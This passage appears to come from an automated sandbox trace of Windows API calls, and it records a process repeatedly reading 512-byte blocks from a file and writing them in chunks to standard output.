(_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] GetFileType (hFile=0x50) returned 0x1 [0149.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.852] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.852] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.852] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.852] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] GetFileType (hFile=0x50) returned 0x1 [0149.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.854] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] GetFileType (hFile=0x50) returned 0x1 [0149.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.855] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] GetFileType (hFile=0x50) returned 0x1 [0149.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.856] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] GetFileType (hFile=0x50) returned 0x1 [0149.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.857] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.857] GetFileType (hFile=0x50) returned 0x1 [0149.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.858] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.858] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] GetFileType (hFile=0x50) returned 0x1 [0149.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.860] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.860] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 